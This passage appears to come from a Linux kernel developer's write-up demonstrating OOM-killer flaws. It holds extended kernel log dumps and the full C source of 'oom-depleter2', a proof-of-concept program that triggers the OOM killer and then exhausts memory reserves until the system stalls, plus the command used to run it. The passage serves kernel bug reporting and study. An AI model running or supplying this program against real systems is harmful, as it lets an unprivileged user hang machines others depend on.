[ 38.683554] Free swap = 0kB [ 38.684053] Total swap = 0kB [ 38.684528] 524157 pages RAM [ 38.685022] 0 pages HighMem/MovableOnly [ 38.685645] 76583 pages reserved [ 38.686173] 0 pages hwpoisoned [ 48.046321] oom-depleter invoked oom-killer: gfp_mask=0x280da, order=0, oom_score_adj=0 [ 48.047754] oom-depleter cpuset=/ mems_allowed=0 [ 48.048779] CPU: 1 PID: 4797 Comm: oom-depleter Not tainted 4.2.0-rc4-next-20150730+ #80 [ 48.050612] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013 [ 48.052434] 0000000000000000 000000004ecba3fc ffff88006c4938d0 ffffffff81614c2f [ 48.053816] ffff88006c482580 ffff88006c493970 ffffffff81611671 0000000000001000 [ 48.055218] ffff88006c493918 ffffffff8109463c ffff8800784b2b40 ffff88007fc556f8 [ 48.057428] Call Trace: [ 48.058775] [<ffffffff81614c2f>] dump_stack+0x44/0x55 [ 48.060647] [<ffffffff81611671>] dump_header+0x84/0x21c [ 48.062591] [<ffffffff8109463c>] ? update_curr+0x9c/0xe0 [ 48.064393] [<ffffffff810917f7>] ? __enqueue_entity+0x67/0x70 [ 48.066506] [<ffffffff81096b59>] ? set_next_entity+0x69/0x360 [ 48.068633] [<ffffffff81091ee0>] ? pick_next_entity+0xa0/0x150 [ 48.070768] [<ffffffff8110fad4>] oom_kill_process+0x364/0x3d0 [ 48.072874] [<ffffffff81281550>] ? security_capable_noaudit+0x40/0x60 [ 48.074948] [<ffffffff8110fd83>] out_of_memory+0x1f3/0x490 [ 48.076820] [<ffffffff81115214>] __alloc_pages_nodemask+0x904/0x930 [ 48.078885] [<ffffffff811569f0>] alloc_pages_vma+0xb0/0x1f0 [ 48.080781] [<ffffffff811385c0>] handle_mm_fault+0x13a0/0x1960 [ 48.082936] [<ffffffff8112ffce>] ? vmacache_find+0x1e/0xc0 [ 48.084981] [<ffffffff81055c9c>] __do_page_fault+0x17c/0x400 [ 48.086791] [<ffffffff81055f50>] do_page_fault+0x30/0x80 [ 48.088636] [<ffffffff81096b59>] ? set_next_entity+0x69/0x360 [ 48.090630] [<ffffffff8161c918>] page_fault+0x28/0x30 [ 48.092359] [<ffffffff813124c0>] ? __clear_user+0x20/0x50 [ 48.094065] [<ffffffff81316dd8>] iov_iter_zero+0x68/0x250 [ 48.095939] [<ffffffff813e9ef8>] read_iter_zero+0x38/0xa0 [ 48.097690] [<ffffffff8117ad04>] __vfs_read+0xc4/0xf0 [ 48.099545] [<ffffffff8117b489>] vfs_read+0x79/0x120 [ 48.101129] [<ffffffff8117c1a0>] SyS_read+0x50/0xc0 [ 48.102648] [<ffffffff8161adee>] entry_SYSCALL_64_fastpath+0x12/0x71 [ 48.104388] Mem-Info: [ 48.105396] active_anon:410470 inactive_anon:2085 isolated_anon:0 [ 48.105396] active_file:0 inactive_file:31 isolated_file:0 [ 48.105396] unevictable:0 dirty:0 writeback:0 unstable:0 [ 48.105396] slab_reclaimable:1689 slab_unreclaimable:5719 [ 48.105396] mapped:390 shmem:2146 pagetables:2097 bounce:0 [ 48.105396] free:12966 free_pcp:63 free_cma:0 [ 48.114279] Node 0 DMA free:7308kB min:400kB low:500kB high:600kB active_anon:6764kB inactive_anon:80kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:8kB shmem:80kB slab_reclaimable:144kB slab_unreclaimable:372kB kernel_stack:240kB pagetables:568kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes [ 48.124147] lowmem_reserve[]: 0 1731 1731 1731 [ 48.125753] Node 0 DMA32 free:44556kB min:44652kB low:55812kB high:66976kB active_anon:1635116kB inactive_anon:8260kB active_file:0kB inactive_file:124kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774392kB mlocked:0kB dirty:0kB writeback:0kB mapped:1552kB shmem:8504kB slab_reclaimable:6612kB slab_unreclaimable:22504kB kernel_stack:19344kB pagetables:7820kB unstable:0kB bounce:0kB free_pcp:252kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:1620 all_unreclaimable? yes [ 48.137007] lowmem_reserve[]: 0 0 0 0 [ 48.138514] Node 0 DMA: 11*4kB (UE) 8*8kB (UEM) 6*16kB (UE) 2*32kB (EM) 0*64kB 1*128kB (U) 3*256kB (UEM) 2*512kB (UE) 3*1024kB (UEM) 1*2048kB (U) 0*4096kB = 7308kB [ 48.143010] Node 0 DMA32: 1049*4kB (UEM) 507*8kB (UE) 151*16kB (UE) 53*32kB (UEM) 83*64kB (UEM) 52*128kB (EM) 25*256kB (UEM) 11*512kB (M) 6*1024kB (UM) 1*2048kB (M) 0*4096kB = 44556kB [ 48.148196] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 48.150810] 2156 total pagecache pages [ 48.152318] 0 pages in swap cache [ 48.154200] Swap cache stats: add 0, delete 0, find 0/0 [ 48.156089] Free swap = 0kB [ 48.157400] Total swap = 0kB [ 48.158694] 524157 pages RAM [ 48.160055] 0 pages HighMem/MovableOnly [ 48.161496] 76583 pages reserved [ 48.162989] 0 pages hwpoisoned [ 48.164453] [ pid ] uid tgid total_vm rss nr_ptes nr_pmds swapents oom_score_adj name (...snipped...) [ 50.061069] [ 4797] 1000 4797 541715 392157 776 6 0 0 oom-depleter [ 50.062841] Out of memory: Kill process 3796 (oom-depleter) score 877 or sacrifice child [ 50.064684] Killed process 3796 (oom-depleter) total-vm:2166860kB, anon-rss:1568628kB, file-rss:0kB [ 50.066454] Kill process 3797 (oom-depleter) sharing same memory (...snipped...) [ 50.247563] Kill process 3939 (oom-depleter) sharing same memory [ 50.248677] oom-depleter: page allocation failure: order:0, mode:0x280da [ 50.248679] CPU: 2 PID: 3796 Comm: oom-depleter Not tainted 4.2.0-rc4-next-20150730+ #80 [ 50.248680] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013 [ 50.248682] 0000000000000000 000000001529812f ffff88007be67be0 ffffffff81614c2f [ 50.248683] 00000000000280da ffff88007be67c70 ffffffff81111914 0000000000000000 [ 50.248684] ffff88007fffdb28 0000000000000000 ffff88007fc99030 ffff88007be67d30 [ 50.248684] Call Trace: [ 50.248689] [<ffffffff81614c2f>] dump_stack+0x44/0x55 [ 50.248692] [<ffffffff81111914>] warn_alloc_failed+0xf4/0x150 [ 50.248693] [<ffffffff81114b76>] __alloc_pages_nodemask+0x266/0x930 [ 50.248695] [<ffffffff811569f0>] alloc_pages_vma+0xb0/0x1f0 [ 50.248697] [<ffffffff811385c0>] handle_mm_fault+0x13a0/0x1960 [ 50.248702] [<ffffffff8100d6dc>] ? __switch_to+0x23c/0x470 [ 50.248704] [<ffffffff81055c9c>] __do_page_fault+0x17c/0x400 [ 50.248706] [<ffffffff81055f50>] do_page_fault+0x30/0x80 [ 50.248707] [<ffffffff8161c918>] page_fault+0x28/0x30 [ 50.248708] Mem-Info: [ 50.248710] active_anon:423405 inactive_anon:2085 isolated_anon:0 [ 50.248710] active_file:7 inactive_file:10 isolated_file:0 [ 50.248710] unevictable:0 dirty:0 writeback:0 unstable:0 [ 50.248710] slab_reclaimable:1689 slab_unreclaimable:5719 [ 50.248710] mapped:393 shmem:2146 pagetables:2097 bounce:0 [ 50.248710] free:0 free_pcp:21 free_cma:0 [ 50.248714] Node 0 DMA free:28kB min:400kB low:500kB high:600kB active_anon:13988kB inactive_anon:80kB active_file:28kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:80kB slab_reclaimable:144kB slab_unreclaimable:372kB kernel_stack:240kB pagetables:568kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:4 all_unreclaimable? no [ 50.248715] lowmem_reserve[]: 0 1731 1731 1731 [ 50.248717] Node 0 DMA32 free:0kB min:44652kB low:55812kB high:66976kB active_anon:1679632kB inactive_anon:8260kB active_file:0kB inactive_file:48kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774392kB mlocked:0kB dirty:0kB writeback:0kB mapped:1576kB shmem:8504kB slab_reclaimable:6612kB slab_unreclaimable:22504kB kernel_stack:19344kB pagetables:7820kB unstable:0kB bounce:0kB free_pcp:84kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 50.248718] lowmem_reserve[]: 0 0 0 0 [ 50.248721] Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB [ 50.248723] Node 0 DMA32: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB [ 50.248724] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 50.248724] 2149 total pagecache pages [ 50.248725] 0 pages in swap cache [ 50.248725] Swap cache stats: add 0, delete 0, find 0/0 [ 50.248725] Free swap = 0kB [ 50.248726] Total swap = 0kB [ 50.248726] 524157 pages RAM [ 50.248726] 0 pages HighMem/MovableOnly [ 50.248726] 76583 pages reserved [ 50.248727] 0 pages hwpoisoned (...snipped...) [ 50.248940] oom-depleter: page allocation failure: order:0, mode:0x280da [ 50.248940] CPU: 2 PID: 3796 Comm: oom-depleter Not tainted 4.2.0-rc4-next-20150730+ #80 [ 50.248940] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013 [ 50.248941] 0000000000000000 000000001529812f ffff88007be67be0 ffffffff81614c2f [ 50.248942] 00000000000280da ffff88007be67c70 ffffffff81111914 0000000000000000 [ 50.248942] ffff88007fffdb28 0000000000000000 ffff88007fc99030 ffff88007be67d30 [ 50.248942] Call Trace: [ 50.248943] [<ffffffff81614c2f>] dump_stack+0x44/0x55 [ 50.248944] [<ffffffff81111914>] warn_alloc_failed+0xf4/0x150 [ 50.248945] [<ffffffff81114b76>] __alloc_pages_nodemask+0x266/0x930 [ 50.248946] [<ffffffff811569f0>] alloc_pages_vma+0xb0/0x1f0 [ 50.248947] [<ffffffff811385c0>] handle_mm_fault+0x13a0/0x1960 [ 50.248948] [<ffffffff81110080>] ? pagefault_out_of_memory+0x60/0xb0 [ 50.248949] [<ffffffff81055c9c>] __do_page_fault+0x17c/0x400 [ 50.248950] [<ffffffff81055f50>] do_page_fault+0x30/0x80 [ 50.248951] [<ffffffff8161c918>] page_fault+0x28/0x30 [ 50.248951] Mem-Info: [ 50.248952] active_anon:423405 inactive_anon:2085 isolated_anon:0 [ 50.248952] active_file:7 inactive_file:10 isolated_file:0 [ 50.248952] unevictable:0 dirty:0 writeback:0 unstable:0 [ 50.248952] slab_reclaimable:1689 slab_unreclaimable:5719 [ 50.248952] mapped:393 shmem:2146 pagetables:2097 bounce:0 [ 50.248952] free:0 free_pcp:21 free_cma:0 [ 50.248954] Node 0 DMA free:28kB min:400kB low:500kB high:600kB active_anon:13988kB inactive_anon:80kB active_file:28kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:80kB slab_reclaimable:144kB slab_unreclaimable:372kB kernel_stack:240kB pagetables:568kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:4 all_unreclaimable? no [ 50.248955] lowmem_reserve[]: 0 1731 1731 1731 [ 50.248957] Node 0 DMA32 free:0kB min:44652kB low:55812kB high:66976kB active_anon:1679632kB inactive_anon:8260kB active_file:0kB inactive_file:48kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774392kB mlocked:0kB dirty:0kB writeback:0kB mapped:1576kB shmem:8504kB slab_reclaimable:6612kB slab_unreclaimable:22504kB kernel_stack:19344kB pagetables:7820kB unstable:0kB bounce:0kB free_pcp:84kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 50.248957] lowmem_reserve[]: 0 0 0 0 [ 50.248959] Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB [ 50.248961] Node 0 DMA32: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB [ 50.248961] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 50.248962] 2149 total pagecache pages [ 50.248962] 0 pages in swap cache [ 50.248962] Swap cache stats: add 0, delete 0, find 0/0 [ 50.248962] Free swap = 0kB [ 50.248962] Total swap = 0kB [ 50.248963] 524157 pages RAM [ 50.248963] 0 pages HighMem/MovableOnly [ 50.248963] 76583 pages reserved [ 50.248963] 0 pages hwpoisoned [ 51.212857] Kill process 3940 (oom-depleter) sharing same memory (...snipped...) [ 52.299532] Kill process 4797 (oom-depleter) sharing same memory [ 85.966108] sysrq: SysRq : Show Memory [ 85.967079] Mem-Info: [ 85.967643] active_anon:423788 inactive_anon:2085 isolated_anon:0 [ 85.967643] active_file:0 inactive_file:1 isolated_file:0 [ 85.967643] unevictable:0 dirty:0 writeback:0 unstable:0 [ 85.967643] slab_reclaimable:1689 slab_unreclaimable:5401 [ 85.967643] mapped:391 shmem:2146 pagetables:2123 bounce:0 [ 85.967643] free:4 free_pcp:0 free_cma:0 [ 85.974400] Node 0 DMA free:0kB min:400kB low:500kB high:600kB active_anon:14076kB inactive_anon:80kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:8kB shmem:80kB slab_reclaimable:144kB slab_unreclaimable:340kB kernel_stack:240kB pagetables:572kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:8 all_unreclaimable? yes [ 85.983232] lowmem_reserve[]: 0 1731 1731 1731 [ 85.984550] Node 0 DMA32 free:16kB min:44652kB low:55812kB high:66976kB active_anon:1681076kB inactive_anon:8260kB active_file:0kB inactive_file:4kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774392kB mlocked:0kB dirty:0kB writeback:0kB mapped:1556kB shmem:8504kB slab_reclaimable:6612kB slab_unreclaimable:21264kB kernel_stack:19328kB pagetables:7920kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 85.994326] lowmem_reserve[]: 0 0 0 0 [ 85.995638] Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB [ 85.998389] Node 0 DMA32: 3*4kB (UM) 1*8kB (U) 1*16kB (U) 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 36kB [ 86.001506] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 86.003604] 2147 total pagecache pages [ 86.004878] 0 pages in swap cache [ 86.006083] Swap cache stats: add 0, delete 0, find 0/0 [ 86.007638] Free swap = 0kB [ 86.008793] Total swap = 0kB [ 86.009941] 524157 pages RAM [ 86.011089] 0 pages HighMem/MovableOnly [ 86.012413] 76583 pages reserved [ 86.013632] 0 pages hwpoisoned [ 125.269135] sysrq: SysRq : Show State [ 125.270536] task PC stack pid father [ 125.272269] systemd S ffff88007cc07a08 0 1 0 0x00000000 [ 125.274343] ffff88007cc07a08 ffff88007cc08000 ffff88007cc08000 ffff88007cc07a40 [ 125.276505] ffff88007fc0db00 00000000fffd55be ffff88007fffc000 ffff88007cc07a20 [ 125.278661] ffffffff8161793e ffff88007fc0db00 ffff88007cc07aa8 ffffffff81619fcd [ 125.280844] Call Trace: [ 125.282076] [<ffffffff8161793e>] schedule+0x2e/0x70 [ 125.283698] [<ffffffff81619fcd>] schedule_timeout+0x11d/0x1c0 [ 125.285481] [<ffffffff810be7c0>] ? cascade+0x90/0x90 [ 125.287131] [<ffffffff8111caef>] ? pfmemalloc_watermark_ok+0xaf/0xe0 [ 125.289038] [<ffffffff8111ccee>] throttle_direct_reclaim+0x1ce/0x240 [ 125.290955] [<ffffffff810a0870>] ? wait_woken+0x80/0x80 [ 125.292676] [<ffffffff81120bd0>] try_to_free_pages+0x80/0xc0 [ 125.294478] [<ffffffff81114e14>] __alloc_pages_nodemask+0x504/0x930 [ 125.296401] [<ffffffff8110cb07>] ? __page_cache_alloc+0x97/0xb0 [ 125.298283] [<ffffffff8115576c>] alloc_pages_current+0x8c/0x100 [ 125.300141] [<ffffffff8110cb07>] __page_cache_alloc+0x97/0xb0 [ 125.301977] [<ffffffff8110e728>] filemap_fault+0x218/0x490 [ 125.303759] [<ffffffff81237c79>] xfs_filemap_fault+0x39/0x60 [ 125.305576] [<ffffffff81132e69>] __do_fault+0x49/0xf0 [ 125.307273] [<ffffffff8113809f>] handle_mm_fault+0xe7f/0x1960 [ 125.309100] [<ffffffff811bac6e>] ? ep_scan_ready_list.isra.12+0x19e/0x1c0 [ 125.311114] [<ffffffff811badce>] ? ep_poll+0x11e/0x320 [ 125.312841] [<ffffffff81055c9c>] __do_page_fault+0x17c/0x400 [ 125.314643] [<ffffffff81055f50>] do_page_fault+0x30/0x80 [ 125.316363] [<ffffffff8161c918>] page_fault+0x28/0x30 (...snipped...) [ 130.699717] oom-depleter x ffff88007c06bc28 0 3797 1 0x00000086 [ 130.701724] ffff88007c06bc28 ffff88007a623e80 ffff88007c06c000 ffff88007a6241d0 [ 130.703703] ffff88007c6373e8 ffff88007a623e80 ffff88007cc08000 ffff88007c06bc40 [ 130.705678] ffffffff8161793e ffff88007a624450 ffff88007c06bcb0 ffffffff8106b0d7 [ 130.707654] Call Trace: [ 130.708632] [<ffffffff8161793e>] schedule+0x2e/0x70 [ 130.710064] [<ffffffff8106b0d7>] do_exit+0x677/0xae0 [ 130.711535] [<ffffffff8106b5ba>] do_group_exit+0x3a/0xb0 [ 130.713037] [<ffffffff81074d4f>] get_signal+0x17f/0x540 [ 130.714537] [<ffffffff8100e302>] do_signal+0x32/0x650 [ 130.715991] [<ffffffff81099ffc>] ? load_balance+0x1bc/0x8b0 [ 130.717545] [<ffffffff8100362d>] prepare_exit_to_usermode+0x9d/0xf0 [ 130.719275] [<ffffffff81003753>] syscall_return_slowpath+0xd3/0x1d0 [ 130.720973] [<ffffffff816173a4>] ? __schedule+0x274/0x7e0 [ 130.722536] [<ffffffff8161793e>] ? schedule+0x2e/0x70 [ 130.723989] [<ffffffff8161af4c>] int_ret_from_sys_call+0x25/0x8f (...snipped...) [ 157.243284] oom-depleter R running task 0 4797 1 0x00000084 [ 157.245131] ffff88006c482580 000000004ecba3fc ffff88007fc83c38 ffffffff8108d14a [ 157.247105] ffff88006c482580 ffff88006c4827c0 ffff88007fc83c78 ffffffff8108d23d [ 157.249092] ffff88006c482970 000000004ecba3fc ffffffff8188b780 0000000000000074 [ 157.251054] Call Trace: [ 157.252018] <IRQ> [<ffffffff8108d14a>] sched_show_task+0xaa/0x110 [ 157.253740] [<ffffffff8108d23d>] show_state_filter+0x8d/0xc0 [ 157.255258] [<ffffffff813cd31b>] sysrq_handle_showstate+0xb/0x20 [ 157.256898] [<ffffffff813cda24>] __handle_sysrq+0xf4/0x150 [ 157.258442] [<ffffffff813cde10>] sysrq_filter+0x360/0x3a0 [ 157.259974] [<ffffffff81497c12>] input_to_handler+0x52/0x100 [ 157.261552] [<ffffffff81499797>] input_pass_values.part.5+0x167/0x180 [ 157.263270] [<ffffffff81499afb>] input_handle_event+0xfb/0x4f0 [ 157.264875] [<ffffffff81499f3e>] input_event+0x4e/0x70 [ 157.266366] [<ffffffff814a18eb>] atkbd_interrupt+0x5bb/0x6a0 [ 157.267929] [<ffffffff81495101>] serio_interrupt+0x41/0x80 [ 157.269457] [<ffffffff81495d7a>] i8042_interrupt+0x1da/0x3a0 [ 157.271017] [<ffffffff810b0d3b>] handle_irq_event_percpu+0x2b/0x100 [ 157.272678] [<ffffffff810b0e4a>] handle_irq_event+0x3a/0x60 [ 157.274224] [<ffffffff810b3cb6>] handle_edge_irq+0xa6/0x140 [ 157.275759] [<ffffffff81010ad9>] handle_irq+0x19/0x30 [ 157.277187] [<ffffffff81010478>] do_IRQ+0x48/0xd0 [ 157.278563] [<ffffffff8161b8c7>] common_interrupt+0x87/0x87 [ 157.280091] <EOI> [<ffffffff810a2eb9>] ? native_queued_spin_lock_slowpath+0x19/0x180 [ 157.282070] [<ffffffff8161a95c>] _raw_spin_lock+0x1c/0x20 [ 157.283597] [<ffffffff81130bcd>] __list_lru_count_one.isra.4+0x1d/0x50 [ 157.285316] [<ffffffff81130c1e>] list_lru_count_one+0x1e/0x20 [ 157.286898] [<ffffffff8117d610>] super_cache_count+0x50/0xd0 [ 157.288477] [<ffffffff8111d1d4>] shrink_slab.part.41+0xf4/0x280 [ 157.290087] [<ffffffff81120510>] shrink_zone+0x2c0/0x2d0 [ 157.291595] [<ffffffff81120894>] do_try_to_free_pages+0x164/0x420 [ 157.293242] [<ffffffff81120be4>] try_to_free_pages+0x94/0xc0 [ 157.294799] [<ffffffff81114e14>] __alloc_pages_nodemask+0x504/0x930 [ 157.296474] [<ffffffff811569f0>] alloc_pages_vma+0xb0/0x1f0 [ 157.298019] [<ffffffff811385c0>] handle_mm_fault+0x13a0/0x1960 [ 157.299606] [<ffffffff8112ffce>] ? vmacache_find+0x1e/0xc0 [ 157.301131] [<ffffffff81055c9c>] __do_page_fault+0x17c/0x400 [ 157.302676] [<ffffffff81055f50>] do_page_fault+0x30/0x80 [ 157.304169] [<ffffffff81096b59>] ? set_next_entity+0x69/0x360 [ 157.305737] [<ffffffff8161c918>] page_fault+0x28/0x30 [ 157.307186] [<ffffffff813124c0>] ? __clear_user+0x20/0x50 [ 157.308699] [<ffffffff81316dd8>] iov_iter_zero+0x68/0x250 [ 157.310210] [<ffffffff813e9ef8>] read_iter_zero+0x38/0xa0 [ 157.311713] [<ffffffff8117ad04>] __vfs_read+0xc4/0xf0 [ 157.313155] [<ffffffff8117b489>] vfs_read+0x79/0x120 [ 157.314575] [<ffffffff8117c1a0>] SyS_read+0x50/0xc0 [ 157.315980] [<ffffffff8161adee>] entry_SYSCALL_64_fastpath+0x12/0x71 [ 157.317649] Showing busy workqueues and worker pools: [ 157.319070] workqueue events: flags=0x0 [ 157.320261] pwq 2: cpus=1 node=0 flags=0x0 nice=0 active=4/256 [ 157.321980] pending: vmstat_shepherd, vmstat_update, e1000_watchdog [e1000], vmpressure_work_fn [ 157.324279] workqueue events_freezable: flags=0x4 [ 157.325652] pwq 2: cpus=1 node=0 flags=0x0 nice=0 active=1/256 [ 157.327373] pending: vmballoon_work [vmw_balloon] [ 157.328859] workqueue events_power_efficient: flags=0x80 [ 157.330343] pwq 2: cpus=1 node=0 flags=0x0 nice=0 active=1/256 [ 157.332067] pending: neigh_periodic_work [ 157.333431] workqueue events_freezable_power_: flags=0x84 [ 157.334941] pwq 2: cpus=1 node=0 flags=0x0 nice=0 active=1/256 [ 157.336684] in-flight: 228:disk_events_workfn [ 157.338168] workqueue xfs-log/sda1: flags=0x14 [ 157.339473] pwq 7: cpus=3 node=0 flags=0x0 nice=-20 active=2/256 [ 157.341255] in-flight: 1369:xfs_log_worker [ 157.342674] pending: xfs_buf_ioend_work [ 157.344066] pool 2: cpus=1 node=0 flags=0x0 nice=0 workers=3 idle: 43 14 [ 157.346039] pool 7: cpus=3 node=0 flags=0x0 nice=-20 workers=2 manager: 27 [ 185.044658] sysrq: SysRq : Show Memory [ 185.045975] Mem-Info: [ 185.046968] active_anon:423788 inactive_anon:2085 isolated_anon:0 [ 185.046968] active_file:0 inactive_file:1 isolated_file:0 [ 185.046968] unevictable:0 dirty:0 writeback:0 unstable:0 [ 185.046968] slab_reclaimable:1689 slab_unreclaimable:5401 [ 185.046968] mapped:391 shmem:2146 pagetables:2123 bounce:0 [ 185.046968] free:4 free_pcp:0 free_cma:0 [ 185.056165] Node 0 DMA free:0kB min:400kB low:500kB high:600kB active_anon:14076kB inactive_anon:80kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:8kB shmem:80kB slab_reclaimable:144kB slab_unreclaimable:340kB kernel_stack:240kB pagetables:572kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:8 all_unreclaimable? yes [ 185.066444] lowmem_reserve[]: 0 1731 1731 1731 [ 185.068083] Node 0 DMA32 free:16kB min:44652kB low:55812kB high:66976kB active_anon:1681076kB inactive_anon:8260kB active_file:0kB inactive_file:4kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774392kB mlocked:0kB dirty:0kB writeback:0kB mapped:1556kB shmem:8504kB slab_reclaimable:6612kB slab_unreclaimable:21264kB kernel_stack:19328kB pagetables:7920kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 185.079186] lowmem_reserve[]: 0 0 0 0 [ 185.080783] Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB [ 185.083790] Node 0 DMA32: 3*4kB (UM) 1*8kB (U) 1*16kB (U) 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 36kB [ 185.087232] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 185.089572] 2147 total pagecache pages [ 185.091096] 0 pages in swap cache [ 185.092469] Swap cache stats: add 0, delete 0, find 0/0 [ 185.094288] Free swap = 0kB [ 185.095671] Total swap = 0kB [ 185.097075] 524157 pages RAM [ 185.098466] 0 pages HighMem/MovableOnly [ 185.100005] 76583 pages reserved [ 185.101435] 0 pages hwpoisoned [ 205.509157] sysrq: SysRq : Resetting ---------- Example output end ----------
Then, I was able to deplete memory reserves using the time window. Then, I got a comment that "What about sending SIGKILL immediately after setting TIF_MEMDIE flag?", and I again demonstrated that the result is same, using a different approach.
---------- oom-depleter2.c start ---------- #define _GNU_SOURCE #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <sched.h> #include <sys/klog.h> static int zero_fd = -1; static char *buf = NULL; static unsigned long size = 0; static int trigger(void *unused) { { struct sched_param sp = { }; sched_setscheduler(0, SCHED_IDLE, &sp); } read(zero_fd, buf, size); /* Will cause OOM due to overcommit */ return 0; } int main(int argc, char *argv[]) { unsigned long i; zero_fd = open("/dev/zero", O_RDONLY); for (size = 1048576; size < 512UL * (1 << 30); size <<= 1) { char *cp = realloc(buf, size); if (!cp) { size >>= 1; break; } buf = cp; } /* Let a child thread trigger the OOM killer. */ clone(trigger, malloc(4096) + 4096, CLONE_SIGHAND | CLONE_VM, NULL); { struct sched_param sp = { 99 }; sched_setscheduler(0, SCHED_FIFO, &sp); } /* Wait until the OOM killer messages appear. */ while (1) { i = klogctl(2, buf, size - 1); if (i > 0) { buf[i] = '\0'; if (strstr(buf, "Killed process ")) break; } } /* Deplete all memory reserve. */ for (i = size; i; i -= 4096) buf[i - 1] = 1; return * (char *) NULL; /* Kill all threads. */ } ---------- oom-depleter2.c start ----------
# taskset -c 0 ./oom-depleter2
---------- Example output start ---------- [ 47.069197] oom-depleter2 invoked oom-killer: gfp_mask=0x280da, order=0, oom_score_adj=0 [ 47.070651] oom-depleter2 cpuset=/ mems_allowed=0 [ 47.072982] CPU: 0 PID: 3851 Comm: oom-depleter2 Tainted: G W 4.2.0-rc7-next-20150824+ #85 [ 47.074683] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013 [ 47.076583] 0000000000000000 00000000115c5c6c ffff88007ca2f8c8 ffffffff81313283 [ 47.078014] ffff88007890f2c0 ffff88007ca2f970 ffffffff8117ff7d 0000000000000000 [ 47.079438] 0000000000000202 0000000000000018 0000000000000001 0000000000000202 [ 47.080856] Call Trace: [ 47.081335] [<ffffffff81313283>] dump_stack+0x4b/0x78 [ 47.082233] [<ffffffff8117ff7d>] dump_header+0x82/0x232 [ 47.083234] [<ffffffff81627645>] ? _raw_spin_unlock_irqrestore+0x25/0x30 [ 47.084447] [<ffffffff810fe041>] ? delayacct_end+0x51/0x60 [ 47.085483] [<ffffffff81114fd2>] oom_kill_process+0x372/0x3c0 [ 47.086551] [<ffffffff81071cd0>] ? has_ns_capability_noaudit+0x30/0x40 [ 47.087715] [<ffffffff81071cf2>] ? has_capability_noaudit+0x12/0x20 [ 47.088874] [<ffffffff8111528d>] out_of_memory+0x21d/0x4a0 [ 47.089915] [<ffffffff8111a774>] __alloc_pages_nodemask+0x904/0x930 [ 47.091010] [<ffffffff8115d080>] alloc_pages_vma+0xb0/0x1f0 [ 47.092042] [<ffffffff8113df77>] handle_mm_fault+0x13a7/0x1950 [ 47.093076] [<ffffffff816287cd>] ? 